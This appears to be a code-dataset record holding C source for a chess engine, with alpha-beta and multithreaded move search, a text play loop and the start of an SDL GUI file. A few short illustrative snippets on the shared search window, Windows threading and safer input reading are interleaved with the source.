winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = nodes[i].move, .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t}\n\n\t\t// If the lower bound exceeds the upper bound, terminate the loop\n\t\tif (alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n}\n\n// A version of iterativeDeepeningAlphaBeta with static upper and lower bounds\n// Used for limiting the number of iterations when evaluating all possible moves\n// by restricting the upper and lower bounds to the current bestupper and 
lower bounds\n// (used when threading)\nNode pIDAB(Position * position, char depth, int * p_alpha, int * p_beta) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth == 1)\n\t\treturn quiescenceSearch(position);\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove))\n\t\treturn staticNode;\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\tPosition newPosition;\n\tint i;\n\tint alpha = *p_alpha;\n\tint beta = *p_beta;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, nodes[i].move);\n\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = iterativeDeepeningAlphaBeta(&newPosition, depth-1, alpha, beta, FALSE).score;\n\n\t\t// If the returned score wins the game, return that node\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = nodes[i].move, .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t}\n\n\t\t// If the lower bounds exceed any of the upper bounds, terminate the loop\n\t\tif (alpha > beta || alpha > *p_beta || *p_alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n\n}\n\n// A version of pIDAB that writes the search data to a hash file\nNode pIDABhashed(Position * position, char depth, int * p_alpha, int * p_beta) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position)) {\n\t\tint score = endNodeEvaluation(position);\n\t\twriteToHashFile(position, score, 0);\n\t\treturn (Node) { .score = score };\n\t}\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1) {\n\t\tNode quie = quiescenceSearch(position);\n\t\twriteToHashFile(position, quie.score, depth);\n\t\treturn quie;\n\t}\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove)) {\n\t\twriteToHashFile(position, staticNode.score, 1);\n\t\treturn staticNode;\n\t}\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\n\tPosition newPosition;\n\tint i;\n\tint alpha = *p_alpha;\n\tint beta = *p_beta;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, nodes[i].move);\n\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then 
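/*
 * Illustrative sketch (standalone): why pIDAB() above takes pointers to the
 * alpha/beta window.  Several searches share one window, so a lower bound
 * proven for one candidate move lets the workers examining the other moves
 * stop as soon as they are refuted.  Simulated here sequentially; in the
 * engine the workers are the Windows threads further below.
 */
#include <stdio.h>

/* The opponent picks the reply that minimizes our score; stop early once this
 * move can no longer beat the shared lower bound. */
static int evaluateMove(const int replies[], int count, const int *sharedAlpha) {
	int worst = 1000000;
	int i;
	for (i = 0; i < count; i++) {
		if (replies[i] < worst)
			worst = replies[i];
		if (worst <= *sharedAlpha)
			return worst;              /* refuted: cut off the remaining replies */
	}
	return worst;
}

int main(void) {
	int sharedAlpha = -1000000;

	int repliesA[] = { 40, 35, 60 };   /* move A is worth min(...) = 35 */
	int scoreA = evaluateMove(repliesA, 3, &sharedAlpha);
	if (scoreA > sharedAlpha) sharedAlpha = scoreA;

	int repliesB[] = { 30, 80, 90 };   /* the first reply already refutes move B */
	int scoreB = evaluateMove(repliesB, 3, &sharedAlpha);
	if (scoreB > sharedAlpha) sharedAlpha = scoreB;

	printf("best score so far = %d\n", sharedAlpha);   /* prints 35 */
	return 0;
}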
simulates making more moves after that move, and returns best score)\n\t\tint score = iterativeDeepeningAlphaBeta(&newPosition, depth-1, alpha, beta, FALSE).score;\n\t\twriteToHashFile(&newPosition, score, depth-1);\n\n\t\t// If the returned score wins the game, return that node\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = nodes[i].move, .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t}\n\n\t\t// If the lower bounds exceed any of the upper bounds, terminate the loop\n\t\tif (alpha > beta || alpha > *p_beta || *p_alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\twriteToHashFile(position, position->toMove==WHITE?alpha:beta, depth);\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n}\n\n\n// Parallel processing currently only implemented for Windows\n// ifdef block to define windows-only features\n#ifdef _WIN32\n\n// Threaded position evaluation function for windows\nDWORD WINAPI evaluatePositionThreadFunction(LPVOID lpParam) {\n\t// Get thread info\n\tThreadInfo * tInfo = (ThreadInfo *) lpParam;\n\t// Get position to evaluate from the thread info\n\tPosition * pos = &tInfo->pos;\n\n\t// Evalute the value of the node using pIDAB\n\tNode node = pIDAB(pos, tInfo->depth, tInfo->alpha, tInfo->beta);\n\n\t// If the new node score is better than the old node score\n\t// Update the global upper and lower bounds accordingly\n\tif ( pos->toMove == BLACK && node.score > *tInfo->alpha ) {\n\t\t*tInfo->alpha = node.score;\n\t} else if ( pos->toMove == WHITE && node.score < *tInfo->beta ) {\n\t\t*tInfo->beta = node.score;\n\t}\n\n\tif (tInfo->verbose) {\n\t\tprintf(\"-\");\n\t\tfflush(stdout);\n\t}\n\n\t// Return the score of the node\n\treturn node.score;\n}\n\n// Threaded position evaluation function that calls pIDABhashed instead of pIDAB\nDWORD WINAPI evaluatePositionThreadFunctionHashed(LPVOID lpParam) {\n\t// Get thread info\n\tThreadInfo * tInfo = (ThreadInfo *) lpParam;\n\t// Get position to evaluate from the thread info\n\tPosition * pos = &tInfo->pos;\n\n\t// Evalute the value of the node using pIDABhashed\n\tNode node = pIDABhashed(pos, tInfo->depth, tInfo->alpha, tInfo->beta);\n\n\t// If the new node score is better than the old node score\n\t// Update the global upper and lower bounds accordingly\n\tif ( pos->toMove == BLACK && node.score > *tInfo->alpha ) {\n\t\t*tInfo->alpha = node.score;\n\t} else if ( pos->toMove == WHITE && node.score < *tInfo->beta ) {\n\t\t*tInfo->beta = node.score;\n\t}\n\n\tif (tInfo->verbose) {\n\t\tprintf(\"-\");\n\t\tfflush(stdout);\n\t}\n\n\t// Return the score of the node\n\treturn node.score;\n}\n\n// Function which initiates threaded move search\nNode idabThreaded(Position * position, int depth, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1)\n\t\treturn quiescenceSearch(position);\n\n\tint i;\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\t// If 
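/*
 * Illustrative aside (standalone, Windows-only): the thread plumbing used by
 * idabThreaded() above with the chess logic stripped out.  Each worker gets
 * its input through the LPVOID parameter and reports its result through the
 * thread exit code, which the parent collects with GetExitCodeThread().
 */
#ifdef _WIN32
#include <stdio.h>
#include <windows.h>

typedef struct { int input; } WorkItem;

static DWORD WINAPI worker(LPVOID lpParam) {
	WorkItem * item = (WorkItem *) lpParam;
	return (DWORD) (item->input * item->input);   /* the "score" of this item */
}

int main(void) {
	enum { COUNT = 4 };
	HANDLE threadHandles[COUNT];
	WorkItem items[COUNT];
	int i;

	for (i = 0; i < COUNT; i++) {
		items[i].input = i + 1;
		threadHandles[i] = CreateThread(NULL, 0, worker, (LPVOID) &items[i], 0, NULL);
	}

	/* Block until every worker has finished, as idabThreaded() does. */
	WaitForMultipleObjects((DWORD) COUNT, threadHandles, TRUE, INFINITE);

	for (i = 0; i < COUNT; i++) {
		DWORD result;
		GetExitCodeThread(threadHandles[i], &result);
		printf("worker %d -> %lu\n", i, (unsigned long) result);
		CloseHandle(threadHandles[i]);
	}
	return 0;
}
#endif /* _WIN32 */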
there is only 1 possible move, return that move\n\tif (moveCount == 1) {\n\t\treturn nodes[0];\n\t}\n\n\tif (verbose) {\n\t\tprintf(\"Analyzing %d possible moves with base depth %d:\\n[\", moveCount, depth);\n\t\tfor (i=0; i<moveCount; i++)\n\t\t\tprintf(\" \");\n\t\tprintf(\"]\\r[\");\n\t\tfflush(stdout);\n\t}\n\n\tHANDLE threadHandles[MAX_BRANCHING_FACTOR];\n\tThreadInfo threadInfo[MAX_BRANCHING_FACTOR];\n\t// Initialize upper and lower bounds to maximum values\n\tint alpha = INT32_MIN;\n\tint beta = INT32_MAX;\n\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Initiallize thread struct \n\t\tthreadInfo[i].depth = depth-1;\n\t\tupdatePosition(&threadInfo[i].pos, position, nodes[i].move);\n\t\tthreadInfo[i].alpha = &alpha;\n\t\tthreadInfo[i].beta = &beta;\n\t\tthreadInfo[i].verbose = verbose;\n\n\t\t// Start threaded evaluation of the current move\n\t\tthreadHandles[i] = CreateThread(NULL, 0, evaluatePositionThreadFunction, (LPVOID) &threadInfo[i], 0, NULL);\n\n\t\t// If the thread failed to create, print an error message\n\t\tif ( threadHandles[i] == NULL ) {\n//\t\t\tprintf(\"Error launching process on move #%d!\\n\", i);\n\t\t\tprintf(\"!\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\t// Wait for threads to finish (windows command)\n\tWaitForMultipleObjects((DWORD) moveCount, threadHandles, TRUE, INFINITE);\n\tif (verbose) {\n\t\tprintf(\"]\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Retrieve best move\n\n\tMove bestMove = 0;\n\tint bestMoveScore = position->toMove==WHITE?INT32_MIN:INT32_MAX;\n\tlong unsigned int retVal;\n\tint score;\n\t// For all of the possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Retrieve the exit value of the thread, which is the score of the position\n\t\tGetExitCodeThread(threadHandles[i], &retVal);\n\t\tscore = (int) retVal;\n\n\t\t// If the score is better than the current best score, update the best move and best score\n\t\tif ( (position->toMove == WHITE && score > bestMoveScore) || (position->toMove == BLACK && score < bestMoveScore) ) {\n\t\t\tbestMove = nodes[i].move;\n\t\t\tbestMoveScore = score;\n\t\t}\n\n\t\t// Deallocate thread\n\t\tif (CloseHandle(threadHandles[i]) == 0) {\n//\t\t\tprintf(\"Error on closing thread #%d!\\n\", i);\n\t\t\tprintf(\"x\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestMoveScore };\n}\n\n// Function which initiates threaded move search with initial upper and lower bounds\n// Evaluates value of first position before performing threading, and restricts\n// the upper and lower bounds of the threads to the upper and lower bounds of the\n// first position\nNode idabThreadedBestFirst(Position * position, int depth, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1)\n\t\treturn quiescenceSearch(position);\n\n\tint i;\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\t// If there is only 1 possible move, return that move\n\tif (moveCount == 1) {\n\t\treturn nodes[0];\n\t}\n\n\n\tPosition firstPos;\n\t// Simulate first move\n\tupdatePosition(&firstPos, position, nodes[0].move);\n\t// Evaluate score of first move\n\tNode firstReply = idabThreaded(&firstPos, depth-1, FALSE);\n\n\t// If the first move wins 
the game, return that move\n\tif ( firstReply.score == winScore(position->toMove) ) {\n\t\tif (verbose) {\n\t\t\t\tprintf(\"Playing checkmate move: \");\n\t\t\t\tprintFullMove(nodes[0].move, position->board);\n\t\t\t\tprintf(\".\\n\");\n\t\t}\n\t\treturn (Node) { .move = nodes[0].move, .score = firstReply.score };\n\t}\n\n\tif (verbose) {\n\t\tprintf(\"Move \");\n\t\tprintFullMove(nodes[0].move, position->board);\n\t\tprintf(\" had score of %+.2f.\\n\", firstReply.score/100.0);\n\t\tprintf(\"Analyzing other %d possible moves with minimum depth of %d plies:\\n[\", moveCount-1, depth);\n\t\tfor (i=0; i<moveCount-1; i++)\n\t\t\tprintf(\" \");\n\t\tprintf(\"]\\r[\");\n\t\tfflush(stdout);\n\t}\n\n\tHANDLE threadHandles[MAX_BRANCHING_FACTOR];\n\tThreadInfo threadInfo[MAX_BRANCHING_FACTOR];\n\t// Initialize upper and lower bounds to maximum values\n\tint alpha = INT32_MIN;\n\tint beta = INT32_MAX;\n\n\t// Set upper and lower bounds\n\tif (position->toMove == WHITE) {\n\t\talpha = firstReply.score;\n\t} else {\n\t\tbeta = firstReply.score;\n\t}\n\n\t// For all possible moves\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Initiallize thread struct \n\t\tthreadInfo[i].depth = depth-1;\n\t\tupdatePosition(&threadInfo[i].pos, position, nodes[i+1].move);\n\t\tthreadInfo[i].alpha = &alpha;\n\t\tthreadInfo[i].beta = &beta;\n\t\tthreadInfo[i].verbose = verbose;\n\n\t\t// Start threaded evaluation of the current move\n\t\tthreadHandles[i] = CreateThread(NULL, 0, evaluatePositionThreadFunction, (LPVOID) &threadInfo[i], 0, NULL);\n\n\t\t// If the thread failed to create, print an error message\n\t\tif ( threadHandles[i] == NULL ) {\n//\t\t\tprintf(\"Error launching process on move #%d!\\n\", i);\n\t\t\tprintf(\"!\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\t// Wait for threads to finish (windows command)\n\tWaitForMultipleObjects((DWORD) moveCount-1, threadHandles, TRUE, INFINITE);\n\tif (verbose) {\n\t\tprintf(\"] Done!\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Retrieve best move\n\n\tMove bestMove = nodes[0].move;\n\tint bestMoveScore = firstReply.score;\n\tlong unsigned int retVal;\n\tint score;\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Retrieve the exit value of the thread, which is the score of the position\n\t\tGetExitCodeThread(threadHandles[i], &retVal);\n\t\tscore = (int) retVal;\n\n\t\t// If the score is better than the current best score, update the best move and best score\n\t\tif ( (position->toMove == WHITE && score > bestMoveScore) || (position->toMove == BLACK && score < bestMoveScore) ) {\n\t\t\tbestMove = nodes[i+1].move;\n\t\t\tbestMoveScore = score;\n\t\t}\n\n\t\t// Deallocate thread\n\t\tif (CloseHandle(threadHandles[i]) == 0) {\n//\t\t\tprintf(\"Error on closing thread #%d!\\n\", i);\n\t\t\tprintf(\"x\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestMoveScore };\n}\n\n// Same as idabThreadedBestFirst, but calls the hashed version of evaluatePositionThreadFunction\nNode idabThreadedBestFirstHashed(Position * position, int depth, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position)) {\n\t\tint score = endNodeEvaluation(position);\n\t\twriteToHashFile(position, score, 0);\n\t\treturn (Node) { .score = score };\n\t}\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1) {\n\t\tNode quie = quiescenceSearch(position);\n\t\twriteToHashFile(position, quie.score, depth);\n\t\treturn quie;\n\t}\n\n\tint i;\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\t// Find list of 
possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\t// If there is only 1 possible move, return that move\n\tif (moveCount == 1) {\n\t\treturn nodes[0];\n\t}\n\n\tPosition firstPos;\n\t// Simulate first move\n\tupdatePosition(&firstPos, position, nodes[0].move);\n\t// Evaluate score of first move\n\tNode firstReply = idabThreaded(&firstPos, depth-1, FALSE);\n\n\t// If the first move wins the game, return that move\n\tif ( firstReply.score == winScore(position->toMove) ) {\n\t\tif (verbose) {\n\t\t\t\tprintf(\"Playing checkmate move: \");\n\t\t\t\tprintFullMove(nodes[0].move, position->board);\n\t\t\t\tprintf(\".\\n\");\n\t\t}\n\t\twriteToHashFile(position, firstReply.score, depth);\n\t\treturn (Node) { .move = nodes[0].move, .score = firstReply.score };\n\t}\n\n\tif (verbose) {\n\t\tprintf(\"Move \");\n\t\tprintFullMove(nodes[0].move, position->board);\n\t\tprintf(\" had score of %+.2f.\\n\", firstReply.score/100.0);\n\t\tprintf(\"Analyzing other %d possible moves with minimum depth of %d plies:\\n[\", moveCount-1, depth);\n\t\tfor (i=0; i<moveCount-1; i++)\n\t\t\tprintf(\" \");\n\t\tprintf(\"]\\r[\");\n\t\tfflush(stdout);\n\t}\n\n\tHANDLE threadHandles[MAX_BRANCHING_FACTOR];\n\tThreadInfo threadInfo[MAX_BRANCHING_FACTOR];\n\t// Initialize upper and lower bounds to maximum values\n\tint alpha = INT32_MIN;\n\tint beta = INT32_MAX;\n\n\t// Set upper and lower bounds\n\tif (position->toMove == WHITE) {\n\t\talpha = firstReply.score;\n\t} else {\n\t\tbeta = firstReply.score;\n\t}\n\n\t// For all possible moves\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Initiallize thread struct \n\t\tthreadInfo[i].depth = depth-1;\n\t\tupdatePosition(&threadInfo[i].pos, position, nodes[i+1].move);\n\t\tthreadInfo[i].alpha = &alpha;\n\t\tthreadInfo[i].beta = &beta;\n\t\tthreadInfo[i].verbose = verbose;\n\n\t\t// Start threaded evaluation of the current move\n\t\tthreadHandles[i] = CreateThread(NULL, 0, evaluatePositionThreadFunctionHashed, (LPVOID) &threadInfo[i], 0, NULL);\n\n\t\tif ( threadHandles[i] == NULL ) {\n//\t\t\tprintf(\"Error launching process on move #%d!\\n\", i);\n\t\t\tprintf(\"!\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\t// Wait for threads to finish (windows command)\n\tWaitForMultipleObjects((DWORD) moveCount-1, threadHandles, TRUE, INFINITE);\n\tif (verbose) {\n\t\tprintf(\"] Done!\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Retrieve best move\n\n\tMove bestMove = nodes[0].move;\n\tint bestMoveScore = firstReply.score;\n\tlong unsigned int retVal;\n\tint score;\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Retrieve the exit value of the thread, which is the score of the position\n\t\tGetExitCodeThread(threadHandles[i], &retVal);\n\t\tscore = (int) retVal;\n\n\t\twriteToHashFile(&threadInfo[i].pos, score, depth-1);\n\n\t\t// If the score is better than the current best score, update the best move and best score\n\t\tif ( (position->toMove == WHITE && score > bestMoveScore) || (position->toMove == BLACK && score < bestMoveScore) ) {\n\t\t\tbestMove = nodes[i+1].move;\n\t\t\tbestMoveScore = score;\n\t\t}\n\n\t\t// Deallocate thread\n\t\tif (CloseHandle(threadHandles[i]) == 0) {\n//\t\t\tprintf(\"Error on closing thread #%d!\\n\", i);\n\t\t\tprintf(\"x\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\twriteToHashFile(position, bestMoveScore, depth);\n\treturn (Node) { .move = bestMove, .score = bestMoveScore };\n}\n\n#endif /* _WIN32 */\n\n// Gets a random move\nMove getRandomMove(Position * position) {\n\tMove 
moves[MAX_BRANCHING_FACTOR];\n\t// Find all legal moves\n\tint totalMoves = legalMoves(moves, position, position->toMove);\n\t// Choose random move and return\n\tint chosenMove = rand() % totalMoves;\n\treturn moves[chosenMove];\n}\n\n// Initial searching for AI move\nMove getAIMove(Game * game, int depth) {\n\tprintf(\"--- AI ---\\n\");\n\tfflush(stdout);\n\n\t// If it is the first move, chooses initial game move using hardcoded initial moves from a .txt file\n\tif ( fromInitial(game) && countBookOccurrences(game) > 0 ) {\n\t\tprintf(\"There are %d available book continuations.\\n\", countBookOccurrences(game));\n\t\tfflush(stdout);\n\t\tMove bookMove = getBookMove(game);\n\t\tprintf(\"CHOSEN book move: \");\n\t\tprintFullMove(bookMove, game->position.board);\n\t\tprintf(\".\\n\");\n\t\tfflush(stdout);\n\t\treturn bookMove;\n\t}\n\n\t// Start timer for search\n\ttime_t startTime, endTime;\n\tstartTime = time(NULL);\n\n//\tMove move = getRandomMove(&game->position);\n//\tMove move = simpleEvaluation(&game->position).move;\n//\tMove move = minimax(&game->position, AI_DEPTH).move;\n//\tNode node = alphaBeta(&game->position, depth, INT32_MIN, INT32_MAX, TRUE);\n//\tNode node = iterativeDeepeningAlphaBeta(&game->position, depth, INT32_MIN, INT32_MAX, TRUE);\n//\tNode node = idabThreaded(&game->position, depth, TRUE);\n//\tNode node = idabThreadedBestFirst(&game->position, depth, TRUE);\n//\tNode node = idabThreadedBestFirstHashed(&game->position, depth, TRUE);\n\n\t// Search for best move using current position\n#ifdef _WIN32\n\tNode node = idabThreadedBestFirst(&game->position, depth, TRUE);\n#else\n\tNode node = iterativeDeepeningAlphaBeta(&game->position, depth, INT32_MIN, INT32_MAX, TRUE);\n#endif\n\n\t// End timer for search\n\tendTime = time(NULL);\n\n\t// Print which move was chosen, and how long it took\n\tprintf(\"CHOSEN move: \");\n\tprintFullMove(node.move, game->position.board);\n\tprintf(\" in %d seconds [%+.2f, %+.2f]\\n\", (int) (endTime-startTime), staticEvaluation(&game->position)/100.0, node.score/100.0);\n\tfflush(stdout);\n\n\treturn node.move;\n}\n\n// Parses a string for a move into a move struct\nMove parseMove(char * move) {\n\t// Converts first couple into a location\n\tint pos1 = str2index(&move[0]);\n\t// Converts second couple into a location\n\tint pos2 = str2index(&move[2]);\n\t// Generates move from 2 locations and returns\n\treturn generateMove(pos1, pos2);\n}\n\n// Gets player input for a move, parses into string and returns as move\nMove getPlayerMove() {\n\tchar input[100];\n\tgets( input );\n\treturn parseMove(input);\n}\n\n// Suggests a move by calling the AI move generator\nMove suggestMove(char fen[], int depth) {\n\tGame game;\n\tgetFenGame(&game, fen);\n\treturn getAIMove(&game, depth);\n}\n\n// ==============================================================\n// \t\t ========= PLAY LOOP (TEXT) ==========\n// ==============================================================\n\n// Prints out that the user is playing as white, then starts the game\nvoid playTextWhite(int depth) {\n\tprintf(\"Playing as WHITE!\\n\");\n\tfflush(stdout);\n\n\tGame game;\n\t// Initialize game\n\tgetInitialGame(&game);\n\n\t// While the game has not ended\n\twhile(TRUE) {\n\t\t// Print the game board\n\t\tprintBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n \tbreak;\n\n\t\t// Player moves\n makeMove(&game, getPlayerMove());\n\n\t\t// Print the game board\n printBoard(game.position.board);\n\t\t// Check game end state\n if 
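/*
 * Illustrative sketch: getPlayerMove() above reads with gets(), which cannot
 * bound the read and was removed from the C11 standard.  A bounded drop-in
 * with the same behaviour, relying on the Move type and parseMove() defined
 * above (getPlayerMoveSafe is a hypothetical name, not part of the engine):
 */
#include <stdio.h>
#include <string.h>

Move getPlayerMoveSafe(void) {
	char input[100] = "";
	if (fgets(input, sizeof(input), stdin) != NULL) {
		input[strcspn(input, "\r\n")] = '\0';   /* strip the trailing newline */
	}
	return parseMove(input);
}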
(hasGameEnded(&game.position))\n\t\t\tbreak;\n\n\t\t// AI moves\n makeMove(&game, getAIMove(&game, depth));\n\t}\n\n\t// Prints the outcome of the game\n\tprintOutcome(&game.position);\n}\n\n// Prints out that the user is playing as black, then starts the game\nvoid playTextBlack(int depth) {\n\tprintf(\"Playing as BLACK!\\n\");\n\tfflush(stdout);\n\n\tGame game;\n\t// Initialize game\n\tgetInitialGame(&game);\n\n\t// While the game has not ended\n\twhile(TRUE) {\n\t\t// Print the game board\n\t\tprintBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n \tbreak;\n\n\t\t// Player moves\n makeMove(&game, getPlayerMove());\n\n\t\t// Print the game board\n printBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n\t\t\tbreak;\n\n\t\t// AI moves\n makeMove(&game, getAIMove(&game, depth));\n\t}\n\n\t// Prints the outcome of the game\n\tprintOutcome(&game.position);\n}\n\n// Decides how to start the game based on the value of WHITE and BLACK\nvoid playTextAs(char color, int depth) {\n\tif (color == WHITE)\n\t\tplayTextWhite(depth);\n\tif (color == BLACK)\n\t\tplayTextBlack(depth);\n}\n\n// Randomizes whether or not the first player is black or white, and calls playText As\nvoid playTextRandomColor(int depth) {\n\tchar colors[] = {WHITE, BLACK};\n\tchar color = colors[rand()%2];\n\tplayTextAs(color, depth);\n}\n\n// ===========================\n\n /*\nint main(int argc, char *argv[]) {\n\tsrand(time(NULL));\n\n\tplayTextRandomColor(DEFAULT_AI_DEPTH);\n\n\treturn EXIT_SUCCESS;\n}\n// */\n" }, { "alpha_fraction": 0.6274271607398987, "alphanum_fraction": 0.6446341872215271, "avg_line_length": 26.5898380279541, "blob_id": "fba019506606f64fd538407516ab241aca5984dc", "content_id": "8d3f399710b942ba81c536e6dd006947cf1adf73", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 23072, "license_type": "permissive", "max_line_length": 189, "num_lines": 807, "path": "/src/fast-chess-gui.c", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "/*\r\n ============================================================================\r\n Name : fast-chess-gui.c\r\n Author : Frederico Jordan <fredericojordan@gmail.com>\r\n Version :\r\n Copyright : Copyright (c) 2016 Frederico Jordan\r\n Description : Graphical user interface for simple chess game!\r\n ============================================================================\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <SDL2/SDL.h>\r\n#include <SDL2/SDL_blendmode.h>\r\n#include <SDL2/SDL_error.h>\r\n#include <SDL2/SDL_events.h>\r\n#include <SDL2/SDL_image.h>\r\n#include <SDL2/SDL_keyboard.h>\r\n#include <SDL2/SDL_keycode.h>\r\n#include <SDL2/SDL_main.h>\r\n#include <SDL2/SDL_pixels.h>\r\n#include <SDL2/SDL_rect.h>\r\n#include <SDL2/SDL_render.h>\r\n#include <SDL2/SDL_surface.h>\r\n#include <SDL2/SDL_video.h>\r\n#include <SDL2/SDL_ttf.h>\r\n#include <time.h>\r\n\r\n#include \"fast-chess.h\"\r\n\r\nint TILE_SIDE = 60;\r\n\r\nchar COLOR_SQUEMES[][6] = {\r\n\t\t\t\t\t\t\t{ 240, 217, 181, 181, 136, 99 }, // LICHESS\r\n\t\t\t\t\t\t\t{ 255, 255, 255, 240, 240, 240 }, // WHITE\r\n\t\t\t\t\t\t\t{ 240, 240, 240, 200, 200, 200 }, // LIGHT_GRAY\r\n\t\t\t\t\t\t\t{ 164, 164, 164, 136, 136, 136 }, // LICHESS_GRAY\r\n\t\t\t\t\t\t\t{ 140, 184, 219, 91, 131, 159 }, // ROYAL BLUE\r\n\t\t\t\t\t\t\t{ 255, 255, 255, 140, 184, 219 }, // 
